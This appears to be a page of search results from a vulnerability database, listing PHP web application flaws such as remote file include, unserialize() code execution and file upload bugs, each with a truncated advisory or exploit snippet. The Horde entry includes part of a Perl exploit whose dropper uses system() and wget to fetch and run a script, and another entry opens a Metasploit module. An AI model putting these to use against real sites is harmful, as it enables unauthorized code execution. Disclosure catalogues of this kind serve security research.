1984 matches found
Zentrack 2.2/2.3/2.4 Index.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote attacker to include a...
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution
No description provided by source. ?php / ---------------------------------------------------------------- Invision Power Board = 3.3.4 unserialize PHP Code Execution ---------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail...................
HiveMail 1.2.2/1.3 addressbook.update.php contactgroupid Variable Arbitrary PHP Command Execution
No description provided by source. source: http://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. The PHP code-execution issues are the result ...
Double Choco Latte 0.9.3/0.9.4 main.php Arbitrary PHP Code Execution
No description provided by source. source: http://www.securityfocus.com/bid/12894/info Double Choco Latte is reported prone to multiple vulnerabilities. These issues result from insufficient sanitization of user-supplied data and may allow an attacker to carry out cross-site scripting/HTML...
Tiki Wiki CMS Groupware <= 8.3 "unserialize()" PHP Code Execution
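Tiki Wiki CMS Groupware 'unserialize' multiple remote PHP code execution vulnerabilities. Vulnerability type: design flaw. Cause: Tiki Wiki CMS Groupware versions before v6.9 and 9.3 contain a security vulnerability in which certain scripts apply the "unserialize" operation to user-controlled input; an attacker can exploit this to inject and execute arbitrary PHP code in the affected application. Remediation: update to the latest version http://info.tiki.org/article210-Tiki-10-0-is-here ?php /...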
Barryvan Compo Manager 0.3 - 'main.php' Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28035/info Barryvan Compo Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containin...
DoceboLMS 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/18110/info DoceboLMS is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to include...
InstantCMS 1.6 - Remote PHP Code Execution
No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initializeinfo = superupdateinfoinfo, 'Name' = 'InstantCMS 1.6 Remote PHP Code Execution', 'Description' = %q This module exploits an...
CMS Made Simple 0.10 Lang.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/14709/info CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may exploit this issue to execute arbitra...
LS Simple Guestbook 1.0 - Remote Code Execution Vulnerability
No description provided by source. Special Greetings To - Timq,Warpboy,The-Maggot File: index.php Affects: LS simple guestbook v1 Date: 15th April 2007 Issue Description: =========================================================================== LS simple guestbook fails to sanitize user input...
Magic News Plus 1.0.2 n_layouts.php link_parameters Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/22661/info Magic News Pro is prone to multiple input-validation vulnerabilities because the application fails to properly sanitize user-supplied input. These issues include a remote file-include issue and two cross-site...
bcoos 1.0.13 'include/common.php' Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31929/info The 'bcoos' program is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...
HiveMail 1.2.2/1.3 index.php $_SERVER['PHP_SELF'] XSS
No description provided by source. source: http://www.securityfocus.com/bid/16591/info HiveMail is prone to multiple vulnerabilities. These vulnerabilities may allow the execution of arbitrary PHP code, cross-site scripting attacks, and SQL injection. The PHP code-execution issues are the result ...
Horde Framework Unserialize PHP Code Execution
ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...
CVE-2013-5352
Sharetronix 3.1.1.3 and earlier versions are vulnerable to remote PHP code execution via the activities_text parameter to /services/activities/set or the comments_text parameter to /services/comments/set, caused by unsafe handling of the PHP preg_replace function with the /e modifier. The vulnera...
Design/Logic Flaw
The Yaml::parse function in Symfony 2.0.x before 2.0.22 allows remote attackers to execute arbitrary PHP code via a PHP file, a different vulnerability than CVE-2013-1397...
CVE-2013-1397
CVE-2013-1397 affects Symfony 2.0.x before 2.0.22, 2.1.x before 2.1.7, and 2.2.x, where a remote attacker can execute arbitrary PHP code by sending a serialized PHP object to the Yaml::parse or Yaml\Parser::parse function. Root cause: insecure handling in YAML parsing leading to code execution. I...
Clipperz Password Manager RCE Vulnerability (May 2014) - Active Check
Clipperz Password Manager is prone to a remote code execution (RCE) vulnerability. SPDX-FileCopyrightText: 2014 Greenbone AG. Some text descriptions might be excerpted from (a) referenced source(s), and are Copyright (C) by the respective right holder(s). SPDX-License-Identifier: GPL-2.0-only ifdescription...
Dotclear 2.6.2 Arbitrary File Upload
------------------------------------------------------------------------ Dotclear = 2.6.2 Media Manager Unrestricted File Upload Vulnerability ------------------------------------------------------------------------ - Software Link: http://dotclear.org/ - Affected Versions: Version 2.6.2 and...
Clipperz Password Manager Code Execution Vulnerability
Clipperz Password Manager suffers from a remote code execution vulnerability. Exploit Title : Clipperz Password Manager remote code execution vulnerability Author : Manish Kishan Tanwar Vendor : https://clipperz.is/opensource/clipperzpasswordmanager/ Download Link :...